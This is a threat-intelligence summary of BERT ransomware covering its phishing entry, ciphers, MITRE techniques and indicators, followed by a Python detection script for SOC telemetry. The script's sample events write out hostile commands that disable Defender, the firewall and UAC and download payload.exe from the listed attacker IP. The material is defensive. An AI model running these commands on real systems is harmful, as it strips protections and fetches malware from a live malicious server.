BERT ransomware, active since mid-March 2025, targets both Windows and Linux systems, spreads through phishing and uses a mix of ciphers (RSA on Windows; AES, RC4, Salsa20 and ChaCha on Linux). The group runs data leak sites on the dark web and uses a PowerShell script to disable Windows security features and pull its payload from a Swedish-hosted server allocated to a Russian provider. #BERTRansomware #Revil #UNITEDNET
Keypoints
- BERT ransomware was first identified in April 2025 but has been active since mid-March 2025, initially targeting Windows and later expanding to Linux machines by May 2025.
- The ransomware group uses phishing as their primary infection vector and maintains victim data leak and storage sites on the dark web.
- Windows variants append unique extensions such as “encryptedbybert” and use RSA encryption, while the Linux variant shares 80% code similarity with Revil ransomware, using AES, RC4, Salsa20, and ChaCha encryption.
- The group disables Windows Defender, firewall, and User Account Control via a PowerShell script downloaded from an IP based in Sweden but linked to a Russian provider (UNITEDNET/Edinaya Set Limited).
- Ransom demands are made in Bitcoin, with communications conducted through private sessions rather than dedicated onion negotiation sites.
- Victims are mainly located in the US, UK, Malaysia, Taiwan, Colombia, and Turkey, affecting sectors like services, manufacturing, logistics, IT, and healthcare.
- The Windows ransomware samples include manipulated timestamps and use unique filenames such as newcryptor.exe, Bert, and Bert11.
MITRE Techniques
- [T1566] Phishing – BERT ransomware targets victims via phishing emails to initiate infection. (‘It is believed that they target their victims via Phishing.’)
- [T1059.001] Command and Scripting Interpreter: PowerShell – The group uses a PowerShell script to disable security features and fetch and run its payload (T1086 in older ATT&CK versions). (‘During the Investigation, I came across the Powershell file… disabling/downgrading Security and System Privileges.’)
- [T1562.001] Impair Defenses: Disable or Modify Tools / [T1562.004] Disable or Modify System Firewall – The script stops the WinDefend and Sense services and disables Windows Firewall and User Account Control to weaken defenses before encryption. (‘It also attempts to stop security-related services (WinDefend, Sense) and disables Windows Firewall…’)
- [T1105] Ingress Tool Transfer – The ransomware downloads payload.exe from a remote server for execution. (‘It fetches an executable (payload.exe) from an external IP (185.100.157.74)’)
- [T1140] Deobfuscate/Decode Files or Information – The Linux variant carries Base64-encoded data that is decoded at runtime; the cipher algorithms it uses (AES, RC4, Salsa20, ChaCha) belong to the encryption step under T1486 below. (‘Data are also encoded using Base64… Salsa20 and ChaCha algorithms are also observed.’)
- [T1486] Data Encrypted for Impact – Files are encrypted with extensions such as encryptedbybert using RSA and other encryption techniques. (‘The files are encrypted using RSA via WinAPI.’)
Indicators of Compromise
- [IP Address] Payload and PowerShell hosting server – 185.100.157.74 (server geolocated in Sweden, allocated to the Russian provider UNITEDNET / Edinaya Set Limited)
- [Domain] Dark Web leak sites – bertblogsoqmm4ow7nqyh5ik7etsmefdbf25stauecytvwy7tkgizhad.onion, wtwdv3ss4d637dka7iafl7737ucykei7pluzc7is3mgo2vl5nmq7eeid.onion
- [File Hashes] Windows sample with legitimate timestamp – MD5: 00fdc504be1788231aa7b7d2d1335893; plus other files with manipulated future timestamps
- [File Names] Unique ransomware executables – newcryptor.exe, Bert, Bert11, worker.exe, payload.exe, build.exe, build.exe.bin, ESXDSC04_bert11
- [File Extensions] Encrypted file suffixes – encryptedbybert, encryptedbybert3, encryptedbybert11, encrypted_bert, hellofrombert
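As a worked example of turning the MITRE Techniques and Indicators of Compromise above into something a SOC can run over telemetry, the following Python script is added here; it is not code from the original article or from the BERT operators. The indicator values (IP, file names, encrypted-file extensions) are the ones listed in this page. The regular expressions for the defence-evasion script are assumptions: the page states what the PowerShell does (stops WinDefend/Sense, disables Defender, the firewall and UAC, downloads payload.exe) but not its literal commands, so common command forms for those effects are matched. The sample events are constructed for this example, not captured logs.

```python
"""Match log lines against the BERT ransomware indicators and behaviours listed above.

Indicator values come from the Indicators of Compromise section. The behaviour regexes
are assumed command forms for the effects the page describes (not the actual script).
SAMPLE_EVENTS are constructed PowerShell script-block / Sysmon-style lines, not real logs.
"""
import re
from typing import Dict, List

# --- Atomic indicators from the page ---------------------------------------------
BERT_IPS = {"185.100.157.74"}
BERT_FILENAMES = {
    "newcryptor.exe", "bert", "bert11", "worker.exe", "payload.exe",
    "build.exe", "build.exe.bin", "esxdsc04_bert11",
}
BERT_EXTENSIONS = {
    "encryptedbybert", "encryptedbybert3", "encryptedbybert11",
    "encrypted_bert", "hellofrombert",
}

# --- Behavioural patterns (assumed command forms, see lead-in) -----------------------
BEHAVIOUR_PATTERNS = {
    "T1562.001 Defender disabled or stopped": re.compile(
        r"Set-MpPreference\s+-Disable\w+"
        r"|Stop-Service\b.*\b(WinDefend|Sense)\b"
        r"|\bsc(\.exe)?\s+(stop|config)\s+(WinDefend|Sense)\b", re.I),
    "T1562.004 firewall disabled": re.compile(
        r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"
        r"|Set-NetFirewallProfile\b.*-Enabled\s+False", re.I),
    "UAC disabled (EnableLUA=0)": re.compile(r"EnableLUA\D+0\b", re.I),
    "T1105 ingress tool transfer": re.compile(
        r"\b(Invoke-WebRequest|iwr|curl|wget|DownloadFile|Start-BitsTransfer)\b", re.I),
}

# Tokens are runs of path/URL-safe characters; '\', '/', ':' and whitespace split them,
# so both a URL path and a Windows path yield the bare file name as a token.
_TOKEN = re.compile(r"[A-Za-z0-9_.\-]+")


def scan_event(line: str) -> List[str]:
    """Return the de-duplicated findings for one log line (empty list if clean)."""
    findings: List[str] = []
    for label, pattern in BEHAVIOUR_PATTERNS.items():
        if pattern.search(line):
            findings.append(label)
    for raw in _TOKEN.findall(line):
        tok = raw.strip(".")
        if tok in BERT_IPS:
            findings.append(f"IOC ip {tok}")
        low = tok.lower()
        # 'bert' alone is a weak indicator (common substring); treat file-name hits as
        # context for behavioural hits rather than as standalone alerts.
        if low in BERT_FILENAMES:
            findings.append(f"IOC filename {low}")
        if "." in low and low.rsplit(".", 1)[1] in BERT_EXTENSIONS:
            findings.append(f"IOC encrypted-file extension .{low.rsplit('.', 1)[1]}")
    return list(dict.fromkeys(findings))


def scan_events(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> findings for every line that matched at least one indicator."""
    return {i: f for i, line in enumerate(lines) if (f := scan_event(line))}


# Constructed sample telemetry (not real logs): four evasion/download script blocks,
# one benign process-creation event, one file-creation event with a BERT extension.
SAMPLE_EVENTS = [
    "ScriptBlock: Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force",
    "ScriptBlock: netsh advfirewall set allprofiles state off",
    r"ScriptBlock: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r"ScriptBlock: Invoke-WebRequest http://185.100.157.74/payload.exe -OutFile C:\Users\Public\payload.exe",
    r"ProcessCreate: Image=C:\Windows\System32\svchost.exe ParentImage=C:\Windows\System32\services.exe",
    r"FileCreate: TargetFilename=C:\Finance\Q2.xlsx.encryptedbybert11",
]

if __name__ == "__main__":
    for idx, hits in scan_events(SAMPLE_EVENTS).items():
        print(f"[{idx}] {SAMPLE_EVENTS[idx]}")
        for hit in hits:
            print(f"      -> {hit}")
```

Behavioural matches are listed before atomic ones on purpose: the IP, file names and extensions will rotate between campaigns, while a script block that turns off real-time protection, the firewall and UAC in sequence and then downloads an executable is the part worth alerting on regardless of which name the operators give the next build. An extension hit on a file-creation event is a late signal (encryption has already started) and is best used to scope the incident rather than to prevent it.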
Read more: https://theravenfile.com/2025/06/16/bert-ransomware/